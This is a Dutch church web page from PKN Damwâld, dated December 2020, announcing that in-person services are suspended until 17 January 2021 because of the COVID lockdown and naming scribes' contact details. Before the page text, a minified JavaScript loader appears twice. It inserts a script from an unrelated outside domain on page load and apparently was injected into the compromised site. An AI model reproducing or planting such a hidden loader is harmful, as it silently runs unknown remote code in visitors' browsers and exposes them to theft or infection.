;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Belangrijk bericht ! ..... Namens de kerkenraden: 15-12-2020 - PKN Damwâld

Belangrijk bericht ! ….. Namens de kerkenraden: 15-12-2020

Gepubliceerd op: woensdag 16 december 2020

In verband met de lockdown die de regering per 15-12-2020 heeft ingesteld, hebben wij als moderamen van de beide kerken besloten dat de diensten tot en met zondag 17 januari 2021 helaas niet meer met gemeenteleden kunnen worden bezocht.

De tot nu toe hebben we de adviezen van het RIVM gevolgd en het lijkt nu het verstandigst dit ook te doen. De PKN is zich aan het beraden en komen met een advies als zij de relevante informatie hebben bestudeerd.

In de persconferentie is niet expliciet genoemd dat wij als kerken geen diensten meer mogen houden met 30 personen, maar de ruimte die we krijgen heeft niet te maken met een keus van de overheid die zegt: het is verantwoord dat kerken (in tegenstelling tot kroegen en theaters) groepen mensen blijven ontvangen. Ze is alleen gebaseerd op de vrijheid van de kerken.

Met pijn in ieders hart hebben we deze beslissing genomen, wetend dat het voor een hele groep mensen zo belangrijk is om zondags samen te komen, ook al is het in een zo andere vorm dan we gewend waren. Gelukkig beschikken we over een livestream mogelijkheid en zijn de ochtenddiensten zo toch mee te beleven. Wat er gaat gebeuren met de middagdiensten in januari hoort u zo spoedig mogelijk.

Wat houdt dit nu concreet in:

  • de ochtenddiensten tot en met 17 januari 2021 worden per livestream uitgezonden, er zijn alleen de hoogstnoodzakelijke mensen bij aanwezig (dominee, organist, koster, ambtsdragers en technici). U kunt zich hier dus niet meer voor opgeven. Er is geen Bernetsjerke en oppas.
  • De middagdiensten vanaf zondag 20 december tot en met zondag 17 januari gaan NIET door;
  • De nieuwjaarsdienst die gepland stond in de Ikker wordt uitgezonden vanuit de Ontmoeting;
  • De avondmaalsdienst extra vanuit de Ikker op 17 januari 2021 gaat dus helaas ook NIET door.

Houdt u vooral de Klok en Us Tsjerkenijs in de gaten voor de laatste info.

We wensen u allemaal Gods’zegen toe in deze onrustige tijd, we mogen er zeker van zijn dat God voor Zijn Huis zorgt.

Als u vragen heeft: bel of mail gerust naar de scriba:

Geralda Teertstra

Tel: 0511-424766 of : Hervormdambv@hotmail.com

of

Jan Reitsma

Tel: 0511-421542 of: janrreitsma@gmail.com